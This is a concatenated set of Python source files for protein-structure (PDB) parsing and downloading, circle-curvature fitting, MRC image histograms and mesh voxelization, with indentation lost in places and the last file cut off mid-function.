        # empty list [] to the list of coordinates.
if line == '':
coords = []
else:
            # Each line should contain a list of 12 numbers separated by whitespace.
coords = list(map(float, line.split()))
if len(coords) != 4*3:
sys.stderr.write('Error(coords2dihedrals):\n'+'Each line should either contain 12 numbers or be blank.\n')
sys.exit(-1)
coords_list.append(coords)
    # Truncate the data we don't want.
    # (Why? The residues at the beginning and end of helices
    #  are less trustworthy than the residues in the middle.)
coords_list = coords_list[truncate_a:len(coords_list)-truncate_b]
N = len(coords_list)
for i in range(0,N):
if len(coords_list[i]) == 3*4:
r0 = [coords_list[i][3*0+0],
coords_list[i][3*0+1],
coords_list[i][3*0+2]]
r1 = [coords_list[i][3*1+0],
coords_list[i][3*1+1],
coords_list[i][3*1+2]]
r2 = [coords_list[i][3*2+0],
coords_list[i][3*2+1],
coords_list[i][3*2+2]]
r3 = [coords_list[i][3*3+0],
coords_list[i][3*3+1],
coords_list[i][3*3+2]]
phi,l10,l21,l32 = Coords2ProjectedDihedralsLengths(r0, r1, r2, r3,
branch_of_log)
sys.stdout.write(str(phi*180.0/pi) + ' ' +
str(l10) + ' ' +
str(l21) + ' ' +
str(l32) +
'\n')
else:
            # Otherwise, we write out impossible values to let the caller
            # know that this particular dihedral angle could not be computed.
sys.stdout.write('-720 -1 -1 -1\n')
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/download_pdbs.py
```python
g_program_name = __file__.split('/')[-1]
g_date_str = '2021-1-24'
g_version_str = '0.6.0'
import sys, gzip, urllib.request, urllib.error
def FileExists(fname):
try:
file = open(fname, 'r')
except IOError:
exists = False
else:
exists = True
return exists
def ExtractFileName(url):
# The name of the file we create will be the same as the last few
# characters of the URL. (Whatever comes after the last '/' character.)
out_fname = url
slash_loc = out_fname.rfind('/')
    if (slash_loc >= 0): # if '/' was found, then remove the text preceding '/'
out_fname = out_fname[slash_loc+1:]
if (out_fname == ''):
sys.stderr.write('Error: filename difficult to determine from URL:\n' +\
' \"'+url+'\"\n')
sys.exit(-1)
return out_fname
# This function downloads a file from a URL, and (if requested by the user)
# prints out a warning message if there was a problem.
import os
def DownloadFileTo(url, file_name, verbose_mode = True):
# Open the input file (at url) for reading
# Simple way:
# in_file = urllib.urlopen(url)
# But the web site may return garbage if the file doesn't exist.
# Instead, we check for errors first:
try: in_file = urllib.request.urlopen(url)
except urllib.error.URLError as e:
if (verbose_mode):
sys.stderr.write(str(e)+'\n')
sys.stderr.write(' omitting file \"'+file_name+'\"\n')
else:
if (verbose_mode):
sys.stderr.write('downloading file \"'+file_name+'\"\n')
# Open the output file for writing
out_file = open(file_name, 'wb')
out_file.write(in_file.read())
out_file.close()
# This version infers the file name from the URL.
def DownloadFile(url, verbose_mode = True):
DownloadFileTo(url, ExtractFileName(url), verbose_mode)
# Read in the list of PDB files already downloaded:
pdbs_old = set([])
try:
pdbs_old_file = open('pdbs_old.txt', 'r')
for pdb_code in pdbs_old_file:
        pdb_code = pdb_code.strip()  # eliminate trailing and preceding whitespace
        pdb_code = pdb_code.lower()  # pdb codes are case-insensitive
if (len(pdb_code) != 4):
            sys.stderr.write('Error in \"pdbs_old.txt\":\n')
sys.stderr.write(' Invalid PDB-code: \"'+pdb_code+'\"\n')
exit(-1)
pdbs_old.add(pdb_code)
pdbs_old_file.close()
except IOError:
pass
def main():
# Here we keep track of the list of pdb files which
# i) are in the current list of pdb files requested in
# sys.stdin
# ii) are in the current list, but are not downloaded yet
# (new pdb files)
pdbs_current_file = open('pdbs_most_recent.txt', 'w')
pdbs_current = set([]) #entire list of pdb codes requested
pdbs_new = set([]) #a list of new pdb codes requested that were not in the old list
pdbs_old_file = open('pdbs_old.txt', 'a')
for line in sys.stdin:
line = line.strip()
if len(line) == 0:
continue
pdb_code = line.lower() #(pdb codes are case-insensitive)
if (pdb_code in pdbs_new):
sys.stderr.write(pdb_code+' appears redundantly. skipping\n')
elif (pdb_code in pdbs_old):
if (not (pdb_code in pdbs_current)):
sys.stderr.write(pdb_code+' downloaded already. skipping.\n')
pdbs_current.add(pdb_code)
pdbs_current_file.write(pdb_code+'\n')
pdbs_current_file.flush() #<- necessary in case we get interrupted
else:
sys.stderr.write(pdb_code+' appears redundantly. skipping\n')
else:
#Download the corresponding pdb file
file_name = pdb_code+'.pdb.gz' # <- these are compressed files
url = 'http://www.rcsb.org/pdb/files/'+file_name
            # Note: if the URL above fails, try this one instead:
            # url = 'https://files.rcsb.org/download/'+file_name
DownloadFileTo(url, file_name)
#Unzip the pdb file:
            with gzip.open(file_name, 'rb') as f:
                file_content = f.read()
            with open(pdb_code+'.pdb', 'wb') as f:
                f.write(file_content)
if not FileExists(pdb_code+'.pdb'):
sys.stderr.write('Error: A problem occured when trying to download PDB code \"'+pdb_code+'\"\n'
' Delete this entry from the file \"pdbs_old.txt\", and rerun '+g_program_name+'\n')
sys.exit(-1)
#Optional: Download the corresponding DSSP file
url = 'ftp://ftp.cmbi.ru.nl/pub/molbio/data/dssp/'+pdb_code+'.dssp'
DownloadFile(url)
if not FileExists(pdb_code+'.dssp'):
sys.stderr.write(" (The old DSSP PDB is server flaking out again.\n"
" Don't worry. DSSP files are not needed.)\n")
            # Keep track of the pdbs we have downloaded so far:
pdbs_current.add(pdb_code)
pdbs_current_file.write(pdb_code+'\n')
pdbs_current_file.flush() #<- necessary in case we get interrupted
pdbs_old_file.write(pdb_code+'\n')
pdbs_old_file.flush() #<- necessary in case we get interrupted
pdbs_new.add(pdb_code)
pdbs_current_file.close()
def ChainFromPDBfile(chainID, pdb_file):
for line in pdb_file:
line_type = line[0:6]
if line_type in set(['ATOM ', 'HETATM', 'ANISOU', 'SIGATM', 'SIGUIJ']):
if line[21:22] == chainID:
yield line
elif line_type == "HET ":
if line[12:13] == chainID:
yield line
elif line_type == "HELIX ":
initChainID = line[19:20]
endChainID = line[31:32]
if (initChainID == chainID) or (endChainID == chainID):
yield line
elif line_type == "SHEET ":
initChainID = line[21:22]
endChainID = line[32:33]
if (initChainID == chainID) or (endChainID == chainID):
yield line
elif line_type == "TURN ":
initChainID = line[19:20]
endChainID = line[30:31]
if (initChainID == chainID) or (endChainID == chainID):
yield line
elif line_type == "SEQRES":
if line[11:12] == chainID:
yield line
elif line_type == "TER ":
ter_chainID = line[21:22]
if (ter_chainID == chainID) or (ter_chainID == " "):
yield line
else:
yield line
return
if __name__ == "__main__":
main()
```
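The script is normally driven by piping a list of 4-letter PDB codes into its standard input, but the helper functions can also be called directly. A small sketch (the accession code `1ubq` is only an example):

```python
# Download a single compressed PDB entry using the same URL scheme as the script.
DownloadFileTo('http://www.rcsb.org/pdb/files/1ubq.pdb.gz', '1ubq.pdb.gz')
# If that mirror fails, the alternative mentioned in the script:
# DownloadFileTo('https://files.rcsb.org/download/1ubq.pdb.gz', '1ubq.pdb.gz')
```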
#### File: dlpdb/dlpdb/has_helices.py
```python
import sys
def main():
helix_found = False;
for line in sys.stdin:
if (line[0:6] == "HELIX "):
helix_found = True;
if (helix_found):
exit(0) # normal termination indicates a helix was found
else:
exit(1) # non-zero (abnormal termination) exit code indicates
# this PDB file does not contain a helix.
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/has_protein_heavy_atoms.py
```python
import sys
res_types = (['ALA',
'ARG',
'ASN',
'ASP',
'CYS',
'GLU',
'GLN',
'GLY',
'HIS',
'ILE',
'LEU',
'LYS',
'MET',
'PHE',
'PRO',
'SER',
'THR',
'TRP',
'TYR',
'VAL'])
atoms_found = {' CA ':False,
' CB ':False,
' C ':False,
' N ':False,
' O ':False}
def main():
for line in sys.stdin:
if (line[0:5] == 'ATOM '):
atom_type=line[12:16]
res_type=line[17:20]
#print('atom_type=\"'+atom_type+'\", res_type=\"'+res_type+'\"')
if (res_type in res_types):
atoms_found[atom_type] = True
search_criteria_satisfied = True
for atom_type in atoms_found:
if (not atoms_found[atom_type]):
search_criteria_satisfied = False
if (search_criteria_satisfied):
exit(0) # normal termination indicates all atoms were found
else:
exit(1) # non-zero (abnormal termination) exit code indicates this PDB
# file does not contain very many heavy atoms in amino acids
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/pdb2coords_ave.py
```python
import sys
from operator import attrgetter
try:
from .resid import *
except ImportError:
from resid import *
# --- THE FOLLOWING FEATURES (interval restrictions) may be removed later:--
#
# The entire PDB file does not have to be used. Instead, the user can pass
# 6 arguments denoting the first and last residue of an interval in the chain.
# In order to specify any amino acid in a PDB file, you must provide 3
# identifiers:
# the ChainID a single letter specifying
# the SeqNum an integer indicating the location within that chain
# the ICode (an insert code, usually " ")
#
# All 3 identifiers are needed for both the starting and ending residues.
# Consequently this program expects 6 arguments:
# (to be read from the command line)
# ChainID_first SeqNum_first ICode_first ChainID_last SeqNum_last ICode_last
# The following atoms are not included in the average:
ignore_these_atoms = [' N ', ' H ', ' C ', ' O ', ' CA ']
# The following residues are completely excluded:
ignore_these_residues = set(['GLY', 'PRO'])
def main():
use_all_residues = True
if len(sys.argv) > 1:
i = 1
while i < len(sys.argv):
if (len(sys.argv[i]) == 3):
# Add the string to the list of amino acids we want to ignore
resType = sys.argv[i]
ignore_these_residues.add(resType)
i += 1
else: # if not is_digit(sys.argv[i][0])
# If the next argument is a number, then interpret this number
# as a residue sequence number
if len(sys.argv) < i+6:
sys.stderr.write("Error: Not enough arguments or argument type error:\n"
" Offending arguemt #"+str(i)+": \""+sys.argv[i]+"\"\n")
if len(sys.argv[i]) == 1:
sys.stderr.write("\n"
" Is argument \""+sys.argv[i]+"\" a chain ID letter?\n"
" (Chain IDs are only passed as arguments when you want to limit the\n"
" residues considered to within an interval in the PDB file.\n"
" To specify an interval, you must provide 5 more aruments. See below.)\n"
"\n"
" Note: one-letter residue codes (eg A,V,L,...) are not considered\n"
" valid residue types by this program.\n"
" You must specify a 3-letter equivalent (eg ALA, VAL, LYS,...).\n"
" One-letter arguments are interpreted as chain-IDs. (See below.)\n"
" \n"
" By default, the the sequence is extracted from the entire PDB file.\n"
" In that case, no arguments are required.\n"
" Alternately, you can limit the selection to a single interval of\n"
" residues from one of the chains in the PDB file.\n"
" To specify an interval, you must passing 6 arguments to this program.\n"
" This program requires a pair of residues to designate the first and\n"
" last members of the interval. Each residue requires 3 identifiers.\n"
" Consequently the six arguments needed are:\n"
"\n"
"ChainID_first SeqNum_first ICode_first ChainID_last SeqNum_last ICode_last\n"
"\n")
else:
sys.stderr.write("\n"
"Note: PDB files are not passed as arguments\n"
" but are read from the standard input, for example using the notation\n"
"\n"
" "+sys.argv[0]+" < file.pdb\n")
exit(-1)
else:
use_all_residues = False
first = ResID(sys.argv[i], int(sys.argv[i+1]), sys.argv[i+2])
last = ResID(sys.argv[i+3], int(sys.argv[i+4]), sys.argv[i+5])
#sys.stderr.write(' Interval selected: (\"'+first.chainID+'\", '+str(first.seqNum)+', \"'+first.iCode+'\") ... (\"'+last.chainID+'\", '+str(last.seqNum)+', \"'+last.iCode+'\")\n')
i += 6
resID2pos = {}
for line in sys.stdin:
if (line[0:6] == "ATOM "):
#atomID = int(line[6:11])
atomType = line[12:16]
#altLoc = line[16:17]
resType = line[17:20]
chainID = line[21:22]
resSeq = line[22:26]
iCode = line[26:27]
resID = ResID(chainID, int(resSeq), iCode)
#xyz_str = line[30:54]<-not safe. spaces not always in between numbers
x_str = line[30:38].strip()
y_str = line[38:46].strip()
z_str = line[46:54].strip()
x = float(x_str)
y = float(y_str)
z = float(z_str)
if (use_all_residues or ((first<=resID) and (resID<=last))):
if resID not in resID2pos:
resID2pos[resID] = []
# Ignore atoms on the backbone (other than CA), and also
# ignore all atoms which are not heavy atoms (hydrogen atoms).
if ((resType not in ignore_these_residues) and
(atomType not in ignore_these_atoms)):
resID2pos[resID].append([x, y, z, atomType])
# Extract an (unordered) list of the resIDs of the residues in the sequence
resIDs = [resID for resID in resID2pos]
# Residues in PDB files are often not listed in order.
    # Consequently, we must sort the list by chainID, seqNum, and finally iCode:
sequence_of_resIDs = sorted(resIDs, key=attrgetter('chainID','seqNum','iCode'))
# Now loop through the sequence of resIDs, and calculate
# the average position of the atoms in that residue.
for resID in sequence_of_resIDs:
coords = resID2pos[resID]
if coords == []:
sys.stdout.write('\n')
else:
xyz_tot = [0.0 for d in range(0,3)]
num_atoms_in_res = len(coords)
for i in range(0, num_atoms_in_res):
for d in range(0,3):
xyz_tot[d] += coords[i][d]
x_ave = xyz_tot[0] / num_atoms_in_res
y_ave = xyz_tot[1] / num_atoms_in_res
z_ave = xyz_tot[2] / num_atoms_in_res
x_str = str(x_ave)
y_str = str(y_ave)
z_str = str(z_ave)
            # Alternately, I could have used:
            # x_str = "%5.3f" % x_ave
            # y_str = "%5.3f" % y_ave
            # z_str = "%5.3f" % z_ave
sys.stdout.write(x_str+' '+y_str+' '+z_str+'\n')
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/pdb2sheet.py
```python
import sys
def main():
for line in sys.stdin:
if (line[0:6] == "SHEET "):
initChainID = line[21:22]
initSeqNum = int(line[22:26])
initICode = line[26:27]
endChainID = line[32:33]
endSeqNum = int(line[33:37])
endICode = line[37:38]
sys.stdout.write("\""+initChainID+"\" "+str(initSeqNum)+" \""+initICode+
"\" \""+
endChainID+"\" "+str(endSeqNum)+" \""+endICode+"\"\n")
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/pdb2turn.py
```python
import sys
def main():
for line in sys.stdin:
if (line[0:6] == "TURN "):
initChainID = line[19:20]
initSeqNum = int(line[20:24])
initICode = line[24:25]
endChainID = line[30:31]
endSeqNum = int(line[31:35])
endICode = line[35:36]
sys.stdout.write("\""+initChainID+"\" "+str(initSeqNum)+" \""+initICode+
"\" \""+
endChainID+"\" "+str(endSeqNum)+" \""+endICode+"\"\n")
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/select_interval.py
```python
import sys
# Sometimes this program pipes its output to other programs which stops reading
# the PDB file prematurely (such as when multiple MODEL records are present).
# Below we silently suppress the ugly "Broken pipe" message this generates:
import signal
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
try:
from .resid import *
except ImportError:
from resid import *
def main():
if len(sys.argv) != 7:
sys.stderr.write("Error: This program requires 6 arguments.\n"
" This program requires a pair of residues to designate the first and\n"
" last members of the interval. Each residue requires 3 identifiers.\n"
" Consequently the six arguments needed are:\n"
"ChainID_first SeqNum_first ICode_first ChainID_last SeqNum_last ICode_last\n")
exit(-1)
print('\"'+sys.argv[1] + '\" \"' + sys.argv[2] + '\" \"'+ sys.argv[3]+'\"')
first = ResID(sys.argv[1], int(sys.argv[2]), sys.argv[3])
last = ResID(sys.argv[4], int(sys.argv[5]), sys.argv[6])
for line in sys.stdin:
line_type = line[0:6]
if line_type in set(["ATOM ", "HETATM", "ANISOU", "SIGATM", "SIGUIJ"]):
#atomID = int(line[6:11])
#atomType = line[12:16]
#altLoc = line[16:17]
#resType = line[17:20]
chainID = line[21:22]
seqNum = line[22:26]
iCode = line[26:27]
resID = ResID(chainID, int(seqNum), iCode)
if (first <= resID <= last):
sys.stdout.write(line)
elif (line_type == "HET "):
#hetID = line[7:10]
chainID = line[12:13]
seqNum = line[13:17]
iCode = line[17:18]
#numHETATMs = int(line[20:25])
#descriptor = line[30:70]
resID = ResID(chainID, int(seqNum), iCode)
if (first <= resID <= last):
sys.stdout.write(line)
elif (line_type == "HELIX "):
initChainID = line[19:20]
initSeqNum = int(line[21:25])
initICode = line[25:26]
initID = ResID(initChainID, int(initSeqNum), initICode)
endChainID = line[31:32]
endSeqNum = int(line[33:37])
endICode = line[37:38]
endID = ResID(endChainID, int(endSeqNum), endICode)
if (first <= initID <= last) and (first <= endID <= last):
sys.stdout.write(line)
elif (line_type == "SHEET "):
initChainID = line[21:22]
initSeqNum = int(line[22:26])
initICode = line[26:27]
initID = ResID(initChainID, int(initSeqNum), initICode)
endChainID = line[32:33]
endSeqNum = int(line[33:37])
endICode = line[37:38]
endID = ResID(endChainID, int(endSeqNum), endICode)
if (first <= initID <= last) and (first <= endID <= last):
sys.stdout.write(line)
elif (line_type == "TURN "):
initChainID = line[19:20]
initSeqNum = int(line[20:24])
initICode = line[24:25]
initID = ResID(initChainID, int(initSeqNum), initICode)
endChainID = line[30:31]
endSeqNum = int(line[31:35])
endICode = line[35:36]
endID = ResID(endChainID, int(endSeqNum), endICode)
if (first <= initID <= last) and (first <= endID <= last):
sys.stdout.write(line)
elif line_type == "SEQRES":
chainID = line[11:12]
if (first.chainID <= chainID) and (chainID <= last.chainID):
sys.stdout.write(line)
elif line_type == "TER ":
chainID = line[21:22]
seqNum = int(line[22:26])
iCode = line[26:27]
terRes = ResID(chainID, seqNum, iCode)
            if (first <= terRes <= last):
sys.stdout.write(line)
else:
sys.stdout.write(line)
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/strip_secondary_str.py
```python
import sys
def main():
for line in sys.stdin:
if ((line[0:6] != "HELIX ") and
(line[0:6] != "SHEET ") and
(line[0:5] != "TURN ")):
sys.stdout.write(line)
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/truncate_chars.py
```python
import sys
def main():
    if (len(sys.argv) <= 1):
        sys.stderr.write('Error: expected the number of truncations as an argument\n')
        sys.exit(-1)
    truncate_a = int(sys.argv[1])
if (len(sys.argv) >= 3):
truncate_b = int(sys.argv[2])
else:
truncate_b = truncate_a
for line in sys.stdin:
line = line.strip()
if (len(line) > (truncate_a + truncate_b)):
truncated_line = line[truncate_a:len(line)-truncate_b]
else:
truncated_line = ''
sys.stdout.write(truncated_line+'\n')
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/truncate_tokens.py
```python
import sys
def main():
    if (len(sys.argv) <= 1):
        sys.stderr.write('Error: expected the number of truncations as an argument\n')
        sys.exit(-1)
    truncate_a = int(sys.argv[1])
if (len(sys.argv) >= 3):
truncate_b = int(sys.argv[2])
else:
truncate_b = truncate_a
for line in sys.stdin:
line = line.strip()
tokens = line.split()
if (len(line) > (truncate_a + truncate_b)):
truncated_tokens = tokens[truncate_a:len(tokens)-truncate_b]
else:
truncated_tokens = []
for i in range(0,len(truncated_tokens)):
sys.stdout.write(truncated_tokens[i])
if i+1 < len(truncated_tokens):
sys.stdout.write(' ')
sys.stdout.write('\n')
if __name__ == "__main__":
main()
```
|
{
"source": "jewettaij/sabl_mpl",
"score": 4
}
|
#### File: sabl_mpl/sabl_mpl/curvature3pts.py
```python
from math import *
import sys
import numpy as np
def CircleFrom3Points2D(r1, r2, r3):
"""
3 points pass through a circle. Find the center of that circle
and its radius. 3 eqns (below) with 3 unknowns (x0, y0, r)
(x1 - x0)^2 + (y1 - y0)^2 = r^2
(x2 - x0)^2 + (y2 - y0)^2 = r^2
(x3 - x0)^2 + (y3 - y0)^2 = r^2
Solve for (x0, y0) using A * (x0, y0) = B where:
"""
B = np.array([r2[0]**2 - r1[0]**2 +
r2[1]**2 - r1[1]**2,
r3[0]**2 - r2[0]**2 +
r3[1]**2 - r2[1]**2])
A = np.array([[2.0 * (r2[0] - r1[0]),
2.0 * (r2[1] - r1[1])],
[2.0 * (r3[0] - r2[0]),
2.0 * (r3[1] - r2[1])]])
x0, y0 = np.linalg.solve(A,B)
r = sqrt((r1[0] - x0)**2 + (r1[1] - y0)**2)
return r, x0, y0
def CircleFrom3Points(r1, r2, r3):
"""
This is the N-dimensional generalization of CircleFrom3Points2D().
(It works in 3D and also higher dimensions.
This function is not necessary for "sabl.py" which is a 2D program.
Consequently, I never got around to testing it carefully.
Hopefully this function works, but test it first. -A 2020-6-10)
"""
    # Decompose this into a 2D problem using Gram-Schmidt decomposition
# of the original vectors into the basis defined by va=r1-r2 and vb=r3-r2.
# Then apply CircleFrom3Points2D() to find the radius of curvature
# and the central point.
va = r1-r2
vb = r3-r2
ea = va / np.linalg.norm(va)
eb = vb - np.inner(vb,ea)*ea
eb /= np.linalg.norm(eb)
# Now express the vectors r1-r2, r2-r2, and r3-r2
# in the basis formed by unit vectors ea and eb.
    # The resulting _r1, _r2, _r3 vectors are 2D vectors.
_r1 = np.array([np.inner(va, ea), np.inner(va, eb)])
_r2 = np.array(r2-r2) # (this should be the zero vector)
_r3 = np.array([np.inner(vb, ea), np.inner(vb, eb)])
# Now invoke "CircleFrom3Points2D()" to calculate the radius and center
# of the circle in this 2D coordinate system
r, x0, y0 = CircleFrom3Points2D(_r1, _r2, _r3)
# Now convert x0, y0 back into the original coordinate system
r0 = r2 + x0*ea + y0*eb
# Now return the results to the caller
return r, r0
def main():
lines = sys.stdin.readlines()
# r1 r2 and r3 are arrays containing the xyz coordinates of the 3 points
r1 = np.array(list(map(float, lines[0].strip().split()))) #x,y,z of point 1
r2 = np.array(list(map(float, lines[1].strip().split()))) #x,y,z of point 2
r3 = np.array(list(map(float, lines[2].strip().split()))) #x,y,z of point 3
radius, center = CircleFrom3Points(r1, r2, r3)
sys.stdout.write('circle_center =')
for i in range(0, center.size):
sys.stdout.write(' '+str(center[i]))
sys.stdout.write('\n')
sys.stdout.write('radius = '+str(radius)+'\n')
if __name__ == '__main__':
main()
```
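A small worked check of `CircleFrom3Points2D()` (not part of the original module): three points on the unit circle should give radius 1 and center (0, 0). It assumes the module is importable as `curvature3pts`.

```python
from curvature3pts import CircleFrom3Points2D  # assumes the module is on the path

# (1,0), (0,1), (-1,0) all lie on the unit circle centered at the origin.
r, x0, y0 = CircleFrom3Points2D([1.0, 0.0], [0.0, 1.0], [-1.0, 0.0])
print(r, x0, y0)  # expected: 1.0 0.0 0.0
```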
|
{
"source": "jewettaij/visfd",
"score": 3
}
|
#### File: bin/histogram_mrc/histogram_mrc.py
```python
import sys
from math import *
import numpy as np
import matplotlib.pyplot as plt
import mrcfile #(if module not found, then run "pip install mrcfile")
class InputError(Exception):
""" A generic exception object containing a string for error reporting.
(Raising this exception implies that the caller has provided
a faulty input file or argument.)
"""
def __init__(self, err_msg):
self.err_msg = err_msg
def __str__(self):
return self.err_msg
def __repr__(self):
return str(self)
def main():
try:
rescale01 = False
nbins = -1
mask_name = ''
argv = [arg for arg in sys.argv]
i = 1
while i < len(argv):
#sys.stderr.write('argv['+str(i)+'] = \"'+argv[i]+'\"\n')
if argv[i] == '-n':
if i + 1 >= len(argv):
raise InputError('Error: the \"' + argv[i] + '\" argument should be followed by a positive integer.\n')
nbins = int(argv[i + 1])
del argv[i:i + 2]
elif (argv[i] == '-rescale'):
rescale01 = True
del argv[i:i + 1]
elif (argv[i] == '-mask') or (argv[i] == '-m'):
mask_name = argv[i+1]
del argv[i:i + 2]
else:
i += 1
if len(argv) > 2:
            raise InputError('Error: Too many arguments or unrecognized argument:\n'
                             '       '+str(argv[1:])+'\n')
elif len(argv) < 2:
raise InputError('Error: You must supply the name of a file in .MRC (.REC) format.\n')
file_name = argv[1]
try:
hdata = []
sys.stderr.write('Reading MRC file "'+file_name+'"\n')
with mrcfile.open(file_name, 'r') as mrc:
#sys.stdout.write('mrc.data.shape = '+str(mrc.data.shape)+'\n')
hdata = mrc.data.flatten()
if mask_name != '':
sys.stderr.write('Reading MRC file "'+mask_name+'" (mask)\n')
with mrcfile.open(mask_name, 'r') as mask:
if mask.data.shape != mrc.data.shape:
raise InputError('Error: The MRC files ("'+
file_name+'" and "'+mask_name+'")\n'
' must have the same number of voxels in the x,y,z directions.\n'
' (Currently: '+str(mrc.data.shape)+' and '+str(mask.data.shape)+', respectively)\n')
                        mdata = mask.data.flatten()
# Each entry in mdata is assumed to be either 0 or 1
# (or rarely, a number between 0 and 1).
# We can restrict the entries to entries in the original
# hdata array whose corresponding mask value is non-zero
# by multiplying each entry in the two arrays together.
hdata *= mdata
hmin = min(hdata)
hmax = max(hdata)
if hmin == hmax:
raise InputError('Error: The image has only one intensity value: '+str(hmin)+'\n')
if rescale01:
# change to type float
hdata = np.array(hdata, dtype='float32')
hdata -= float(hmin)
hdata *= 1.0/(float(hmax)-float(hmin))
if nbins < 0:
#If unspecified, guess a reasonable number of histogram bins
nbins = 32 # default (for 8 bit integers)
if ((mrc.data.dtype == np.int8) or # 8 bit integers?
(mrc.data.dtype == np.uint8)): # 8 bit integers?
nbins = (1 + int(hmax) - int(hmin))
if rescale01:
hmin = 0.0
hmax = 1.0
sys.stderr.write('nbins = ' + str(nbins) + '\n')
sys.stderr.write('(hmin,hmax) = ('+str(hmin)+','+str(hmax)+')\n')
delta_bin = (float(hmax) - float(hmin)) / float(nbins-1)
sys.stderr.write('delta_bin = ' + str(delta_bin) + '\n')
bins = [hmin + (i-0.5)*delta_bin for i in range(0, nbins+1)]
assert(len(bins) >= 2)
#sys.stderr.write('bins = ' + str(bins) + '\n')
plt.hist(hdata,
bins,
density=True,
facecolor='green',
alpha=0.75)
plt.ylabel('Frequency')
plt.xlabel('Intensity (note: Dark voxels in IMOD have low intensity.)')
plt.grid(True)
plt.show()
except IOError:
raise InputError('Error: Unable to open file \"' + file_name + '\" for reading.\n')
except (InputError) as err:
sys.stderr.write('\n' + str(err) + '\n')
sys.exit(-1)
return
if __name__ == '__main__':
main()
```
#### File: bin/voxelize_mesh/voxelize_mesh.py
```python
import sys
import argparse
import numpy as np
import pyvista as pv
from vtk.util import numpy_support as vtknp
import mrcfile
g_filename = __file__.split('/')[-1]
g_module_name = g_filename
if g_filename.rfind('.py') != -1:
g_module_name = g_filename[:g_filename.rfind('.py')]
g_date_str = '2021-6-17'
g_version_str = '0.0.2'
g_program_name = g_filename
#sys.stderr.write(g_program_name+' v'+g_version_str+' '+g_date_str+' ')
class InputError(Exception):
""" A generic exception object containing a string for error reporting.
(Raising this exception implies that the caller has provided
a faulty input file or argument.)
"""
def __init__(self, err_msg):
self.err_msg = err_msg
def __str__(self):
return self.err_msg
def __repr__(self):
return str(self)
def voxelize_numpy(mesh,
density=None,
check_surface=True,
bounds=None,
                   shift=(0.0, 0.0, 0.0)):
"""Voxelize mesh to create a 3D numpy array of bools (True, False),
indicating whether the corresponding voxel is within the closed surface
formed by the mesh.
Parameters
----------
density : float
The uniform size of the voxels. Defaults to 1/100th of the mesh length.
check_surface : bool
Specify whether to check the surface for closure. If on, then the
algorithm first checks to see if the surface is closed and
manifold. If the surface is not closed and manifold, a runtime
error is raised.
bounds : Size of image in units of physical distance:
(x_min, x_max, y_min, y_max, z_min, z_max)
By default, mesh.bounds is used.
"""
if not pv.is_pyvista_dataset(mesh):
mesh = pv.wrap(mesh)
if density is None:
density = mesh.length / 100
if bounds == None:
bounds = mesh.bounds
x_min, x_max, y_min, y_max, z_min, z_max = bounds
x = np.arange(x_min, x_max, density)
y = np.arange(y_min, y_max, density)
z = np.arange(z_min, z_max, density)
x, y, z = np.meshgrid(x, y, z)
# Create unstructured grid from the structured grid
grid = pv.StructuredGrid(x, y, z)
ugrid = pv.UnstructuredGrid(grid)
# Get part of the mesh within the mesh's bounding surface.
selection = ugrid.select_enclosed_points(mesh.extract_surface(),
tolerance=0.0,
check_surface=check_surface)
mask = selection.point_arrays['SelectedPoints'].view(np.bool_)
# Mask contains an array of True, False values indicating whether
# the corresponding voxel is inside the closed mesh.
# However it is a 1-dimensional VtkArray, not a 3D numpy array.
# It must be converted to a 1D numpy array and converted to 3D with reshape.
# It also must be transposed (x,y,z axes swapped). (I have no idea why.)
data = np.transpose(vtknp.vtk_to_numpy(mask).reshape(grid.dimensions[2],
grid.dimensions[1],
grid.dimensions[0]),
(0,2,1))
return data
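# Illustrative usage sketch of voxelize_numpy() (added for clarity, not part of
# the original script). The mesh file name below is hypothetical; any closed
# surface mesh readable by pyvista should work.
def _example_voxelize_usage(mesh_path='example_mesh.ply', voxel_width=1.0):
    mesh = pv.read(mesh_path)
    # Returns a 3D numpy array of bools marking voxels inside the closed mesh.
    voxels = voxelize_numpy(mesh, density=voxel_width, check_surface=True)
    return voxels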
def main():
try:
ap = argparse.ArgumentParser()
ap.add_argument('-m', '--mesh', dest='fname_mesh', required=True,
help='file containing closed mesh (eg. a ".ply" file)')
ap.add_argument('-o', '--out', dest='fname_out', required=True,
help='name of the output file that will contain the voxelized mesh (mrc/rec format)')
ap.add_argument('-i', '--in', dest='fname_mrc_orig', required=False,
help='file name of an MRC (or REC) file with the same size as the target. (Typically it is the original image in which the mesh surface was detected.)')
ap.add_argument('-w', '--width', dest='voxel_width', required=False, type=float,
help='-w (or --width) should be followed by the voxel width (default 1)')
ap.add_argument('-c', '--crop', dest='ibounds', required=False, type=float, nargs=6,
help='6 numbers indicating desired boundaries of the resulting cropped image: xmin xmax ymin ymax zmin zmax. (These numbers are in units of voxels. Note: This will override the image size determined from the "-i" or "--in" argument.)')
ap.add_argument('-b', '--bounds', dest='bounds', required=False, type=float, nargs=6,
help='6 numbers indicating desired image size: xmin xmax ymin ymax zmin zmax. (If the voxel width is known, these numbers are in units of distance, not voxels. Note: This will override the image size determined from the "-i" or "--in" argument.)')
ap.add_argument('-s', '--shift', dest='shift', required=False, type=float, nargs=3,
help='3 numbers indicating a shift in the x,y,z coordinates of the mesh before voxelization. (These numbers are in units of voxels, not physical distance.)')
args = ap.parse_args()
# Now process the argument list
# Read the mesh file
try:
mesh = pv.read(args.fname_mesh)
except IOError:
raise InputError('Error: Unable to open file "'+
args.fname_mesh+'" for reading.\n')
# Determine the voxel width
voxel_width_from_file = False
voxel_width = args.voxel_width
if voxel_width == 0.0:
            raise InputError('Error: voxel width cannot be zero\n')
# Determine the origin of the coordinate system
origin_from_file = False
#origin = args.origin COMMENTING OUT. WE CAN ADD THIS FEATURE LATER.
origin = None
# Determine how big the image is
bounds = args.bounds
# Make sure the user does not accidentally erase their original tomogram
if args.fname_out == args.fname_mrc_orig:
raise InputError('Error: Input and output image files cannot have the same name.\n')
# Did the user specify an input image?
# If so, use it to determine the output image size (and voxel width)
if args.fname_mrc_orig:
try:
with mrcfile.open(args.fname_mrc_orig, 'r') as mrcdata:
